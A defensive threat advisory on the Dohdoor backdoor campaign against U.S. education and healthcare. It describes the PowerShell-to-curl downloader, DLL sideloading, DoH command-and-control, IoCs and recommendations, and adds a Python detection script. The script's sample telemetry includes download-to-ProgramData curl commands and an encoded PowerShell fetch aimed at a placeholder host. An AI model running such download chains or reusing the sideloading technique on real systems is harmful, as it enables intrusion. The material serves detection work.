Stealthy Dohdoor Backdoor Campaign Targeting U.S. Education and Healthcare via DNS-over-HTTPS
March 10th, 2026
High

Our Cyber Threat Intelligence Unit is monitoring a stealthy malware campaign called Dohdoor that targets U.S. education and healthcare organizations. Security researchers recently reported this activity and linked it to threat cluster UAT-10027. Active since December 2025, the campaign uses DNS-over-HTTPS (DoH) to hide command-and-control (C2) traffic within encrypted web activity, allowing attackers to maintain persistent access and blend into normal network traffic. The attackers use deceptive subdomains that mimic Microsoft update services, with irregular capitalization and uncommon top-level domains to avoid detection. Researchers also observed the use of legitimate system utilities and DLL sideloading to maintain stealth. Although no confirmed data exfiltration has been reported, Dohdoor allows covert command execution, reflective payload delivery, and persistent backdoor access, posing long-term espionage and operational risks.
Technical Details
Threat Type: Backdoor Malware Campaign
Severity: High
Affected Environment: Windows Systems
Associated Threat Cluster: UAT-10027
Attack Chain Overview:
Initial Access: While the exact initial infection vector remains unconfirmed, researchers believe the campaign likely used social-engineering phishing techniques that led to the execution of a PowerShell-based downloader in targeted environments.
Execution and Delivery: Once initial execution is achieved, attackers deploy a multi-stage delivery chain:
PowerShell Execution: A PowerShell command invokes curl.exe to retrieve a malicious Windows batch script from attacker-controlled infrastructure.
Batch Script Deployment: The downloaded .bat or .cmd script creates a hidden working directory within locations such as:
C:\ProgramData
C:\Users\Public
Malicious DLL Delivery: The script downloads a malicious DLL disguised as legitimate Windows libraries, including:
propsys.dll
batmeter.dll
DLL Sideloading: The malicious DLL is executed using legitimate Windows binaries (Living-off-the-Land techniques), including:
Fondue.exe
mblctr.exe
ScreenClippingHost.exe
This approach allows attackers to execute malware while blending activity into legitimate operating system behavior.
Obfuscation and Evasion Techniques:
The campaign employs multiple stealth techniques designed to evade traditional detection controls:
Deceptive subdomains impersonating Microsoft update infrastructure
Mixed capitalization patterns within domain names
Use of uncommon top-level domains such as:
.online
.design
.software
Encrypted command-and-control communications via DNS-over-HTTPS
Use of legitimate Windows utilities for payload execution
Anti-forensic cleanup actions, including deletion of RunMRU history, clipboard clearing, and removal of temporary scripts
Post-Compromise Activity:
Once deployed, the Dohdoor backdoor enables the following attacker capabilities:
Persistent remote access to compromised Windows systems
Encrypted C2 communications via Cloudflare-backed DNS-over-HTTPS services
Execution of attacker-supplied commands
Download, decryption, and reflective execution of additional payloads
Deployment of follow-on tools such as Cobalt Strike Beacon
These capabilities enable adversaries to maintain covert long-term access and potentially conduct reconnaissance, credential harvesting, or follow-on intrusion activities.

Impact
Persistent Backdoor Access: Long-term unauthorized access to compromised systems.
Data Security Risks: Potential for credential harvesting, surveillance, and covert data exfiltration.
Operational Disruption: Healthcare and education systems may experience service disruption affecting clinical systems, research platforms, and academic infrastructure.
Regulatory Exposure: Potential exposure of personal, medical, or academic records may trigger compliance and legal obligations.
Reputational Damage: Data exposure or service interruptions could undermine institutional trust.
Detection Method
Security teams should monitor endpoint and network telemetry for behavioral indicators associated with this campaign:
Suspicious HTTPS Communications:
Persistent outbound HTTPS or DoH connections to newly registered or unfamiliar domains
Domains exhibiting irregular capitalization patterns that mimic legitimate services
Unusual encrypted traffic patterns inconsistent with normal organizational behavior
Suspicious PowerShell Activity: Monitor for abnormal PowerShell execution patterns, including:
Windows Event ID 4688 or Sysmon Event ID 1 showing powershell.exe spawning curl.exe
PowerShell commands retrieving remote scripts or executables
PowerShell Script Block Logging (Event ID 4104) containing external web requests
Abnormal Use of curl.exe:
Execution of curl.exe from user directories or temporary folders
Retrieval of .bat or .cmd files from external infrastructure
Encoded URLs embedded within PowerShell commands
Network Anomaly Monitoring:
Low-volume but persistent outbound connections to previously unseen domains
Traffic patterns consistent with command-and-control beaconing behavior
DNS-over-HTTPS usage originating from endpoints that do not normally utilize DoH services
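The telemetry checks above, implemented as an added example (Python; not the advisory's own code or the researchers' tooling) so they can be exercised against sample data offline. It applies the Detection Method heuristics, together with the domain traits from the Obfuscation and Evasion Techniques section, to constructed Sysmon-style process-creation and image-load records and to destination host names. Only the domain IoCs are taken from this advisory; every path, command line, the example.invalid URLs, the mixed-case lookalike host name, and the list of Microsoft-update lookalike fragments are constructed assumptions for illustration.

```python
"""Added example, not the advisory's or the researchers' code: the Detection Method checks run over
constructed Sysmon-style records and host names. Only the IoC domains are from the advisory."""
import base64
import re
from dataclasses import dataclass

IOC_DOMAINS_DEFANGED = [                    # the advisory's domain IoCs, defanged as printed there
    "cjitdrpwnna[.]mswinsoftupdload[.]design", "lbandugzcfg[.]deepinspectionsystem[.]online",
    "lsypdqgxredfpx[.]mswinsoftupdload[.]design", "yhdjtylnsmwvuu[.]deepinspectionsystem[.]online",
    "sdxsiol[.]pnuisckmhwagzvdyjrlbeft[.]software", "ezqrvkfgejwctdnc[.]pnuisckmhwagzvdyjrlbeft[.]software",
    "txjiqslrrig[.]mswinsoftupdload[.]design", "qhtckzbxtkdvyr[.]mswinsoftupdload[.]design",
    "gitkzxd[.]pnuisckmhwagzvdyjrlbeft[.]software", "gppiwogwndiakkdu[.]pnuisckmhwagzvdyjrlbeft[.]software",
]
IOC_DOMAINS = {d.replace("[.]", ".") for d in IOC_DOMAINS_DEFANGED}
UNCOMMON_TLDS = {"online", "design", "software"}                          # named in the advisory
# Assumption: the advisory only says names mimic Microsoft update services; these generalise "mswinsoftupdload".
LOOKALIKE_FRAGMENTS = ("mswin", "softupd", "winupd", "msupd")
SIDELOAD_DLLS = {"propsys.dll", "batmeter.dll"}                           # from the attack chain section
SIDELOAD_HOSTS = {"fondue.exe", "mblctr.exe", "screenclippinghost.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
_ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


@dataclass
class Event:   # fields used from Sysmon ID 1 / Security 4688 (process create) and Sysmon ID 7 (image load)
    image: str
    parent_image: str = ""
    command_line: str = ""
    image_loaded: str = ""


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline: str) -> str:
    """Decode a PowerShell -EncodedCommand argument (base64 of UTF-16LE); '' if absent or invalid."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_domain(host: str) -> list[str]:
    """Domain traits from the advisory that `host` exhibits (empty list = nothing notable)."""
    name = host.strip().rstrip(".")
    labels = name.lower().split(".")
    reasons = []
    if name.lower() in IOC_DOMAINS:
        reasons.append("known-ioc")
    if labels[-1] in UNCOMMON_TLDS:
        reasons.append("uncommon-tld")
    if any(c.isupper() for c in name) and any(c.islower() for c in name):
        reasons.append("mixed-case")
    if len(labels) >= 2 and any(f in labels[-2] for f in LOOKALIKE_FRAGMENTS):
        reasons.append("ms-update-lookalike")
    return reasons


def check_process(ev: Event) -> list[str]:
    """Process-creation indicators: PowerShell -> curl, batch-script retrieval, plain or encoded URLs."""
    img, parent, cmd = _basename(ev.image), _basename(ev.parent_image), ev.command_line
    reasons = []
    if img == "curl.exe":
        if parent in POWERSHELL:
            reasons.append("powershell-spawns-curl")
        if re.search(r"\\(users|temp)\\", ev.image, re.I):
            reasons.append("curl-from-user-or-temp-dir")
        if any(u.lower().endswith((".bat", ".cmd")) for u in re.findall(r"https?://[^\s\"']+", cmd)):
            reasons.append("curl-fetches-batch-script")
    if img in POWERSHELL:
        if re.search(r"https?://", cmd, re.I):
            reasons.append("powershell-remote-retrieval")
        if re.search(r"https?://", decode_encoded_command(cmd), re.I):
            reasons.append("encoded-url-in-powershell")
    return reasons


def check_image_load(ev: Event) -> list[str]:
    """Sideload indicator: an advisory-named DLL loaded from outside C:\\Windows."""
    if _basename(ev.image_loaded) not in SIDELOAD_DLLS or ev.image_loaded.lower().startswith("c:\\windows\\"):
        return []
    reasons = ["dll-loaded-outside-windows"]
    if _basename(ev.image) in SIDELOAD_HOSTS:
        reasons.append("known-sideload-host")
    return reasons


# Constructed sample telemetry (hypothetical paths; example.invalid is a reserved, non-resolving name).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_PROCESSES = [
    Event(r"C:\Windows\System32\curl.exe", PS, r"curl.exe -s https://example.invalid/update.cmd -o C:\ProgramData\u\u.cmd"),
    Event(PS, r"C:\Windows\explorer.exe", "powershell.exe -enc "
          + base64.b64encode(r"curl.exe https://example.invalid/a.bat -o C:\Users\Public\a.bat".encode("utf-16-le")).decode()),
    Event(r"C:\Windows\System32\curl.exe", r"C:\Windows\System32\cmd.exe", "curl.exe -sI https://example.invalid/"),
]
SAMPLE_LOADS = [
    Event(r"C:\ProgramData\u\mblctr.exe", image_loaded=r"C:\ProgramData\u\propsys.dll"),    # sideload pattern
    Event(r"C:\Windows\explorer.exe", image_loaded=r"C:\Windows\System32\propsys.dll"),     # legitimate load
]
SAMPLE_HOSTS = ["txjiqslrrig.mswinsoftupdload.design", "UpDaTe.MsWinSoftUpd.online", "www.microsoft.com"]

if __name__ == "__main__":
    print([check_process(e) for e in SAMPLE_PROCESSES], [check_image_load(e) for e in SAMPLE_LOADS],
          [score_domain(h) for h in SAMPLE_HOSTS], sep="\n")
```

Two caveats when running logic like this over real telemetry: the mixed-case check is meaningful for TLS SNI, HTTP Host values or DoH request bodies seen at a decrypting proxy, but raw DNS query logs may contain benign mixed case where a resolver applies 0x20 case randomization; and PowerShell calling curl.exe is legitimate in many administration scripts, so pair the process rules with the domain and DoH checks rather than alerting on either alone.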
Indicators of Compromise
Type | Indicator
Domain | cjitdrpwnna[.]mswinsoftupdload[.]design
Domain | lbandugzcfg[.]deepinspectionsystem[.]online
Domain | lsypdqgxredfpx[.]mswinsoftupdload[.]design
Domain | yhdjtylnsmwvuu[.]deepinspectionsystem[.]online
Domain | sdxsiol[.]pnuisckmhwagzvdyjrlbeft[.]software
Domain | ezqrvkfgejwctdnc[.]pnuisckmhwagzvdyjrlbeft[.]software
Domain | txjiqslrrig[.]mswinsoftupdload[.]design
Domain | qhtckzbxtkdvyr[.]mswinsoftupdload[.]design
Domain | gitkzxd[.]pnuisckmhwagzvdyjrlbeft[.]software
Domain | gppiwogwndiakkdu[.]pnuisckmhwagzvdyjrlbeft[.]software
SHA256 | 54e18978c6405f56cd59ba55a62291436639f21cf325ae509f0599b15e8f7f53
SHA256 | 0bb130b1fafb17705d31fe5dd25e7b2d62176578609d75cc57911ef5582ef17a
SHA256 | 54545fa3a2d8da6746021812ebaa9d26f33bba4f63c6f7f35caa6fa4ee8c0e6a
SHA256 | 8e97c677aec905152f8a92fed50bb84ef2e8985d5c29330c5a05a4a2afcbd4a5
SHA256 | 800faaf15d5f42f2ab2c1d2b6b65c8a9e4def6dc10f6ce4e269dcf23f4e8dae2
SHA256 | b1bd8f7d4488977cca03954a57f5c8ad7bfd4609bcc3bae92326830fcbd3232c
SHA256 | 2ce3e75997f89b98dd280d164a5f21f7565f4de26eed61243badde04b480700e

Recommendations
Organizations should take the following actions to reduce risk:
Review EDR, firewall, DNS, and PowerShell logs for suspicious activity described in this advisory.
Ensure EDR solutions are capable of detecting abnormal PowerShell execution and unauthorized downloads.
Enable PowerShell logging, script block logging, and command-line auditing.
Restrict the use of curl.exe and other command-line download and scripting utilities where they are not operationally required.
Implement network segmentation to limit lateral movement between user environments and critical systems.
Monitor for persistent outbound HTTPS or DoH communications to newly observed domains.
Secure privileged and administrative accounts with strong authentication controls.
Maintain isolated, tested backups to support rapid recovery if compromise occurs.
Educate users regarding phishing and suspicious download activity.
Conclusion
The Dohdoor campaign employs stealthy intrusion tactics targeting critical sectors, including healthcare and education. By leveraging encrypted communications, legitimate system utilities, and deceptive infrastructure, attackers can blend malicious activity into normal network traffic and maintain long-term access to compromised systems. We urge organizations to prioritize proactive monitoring, enhanced endpoint visibility, and strict access controls to detect and disrupt these stealth-oriented intrusion techniques before adversaries establish persistent access.
References
https://securereading.com/dohdoor-backdoor-healthcare-education/
https://gurucul.com/latest-threats/new-dohdoor-malware-campaign-targets-education-and-health-care/
https://thehackernews.com/2026/02/uat-10027-targets-us-education-and.html
https://blog.talosintelligence.com/new-dohdoor-malware-campaign/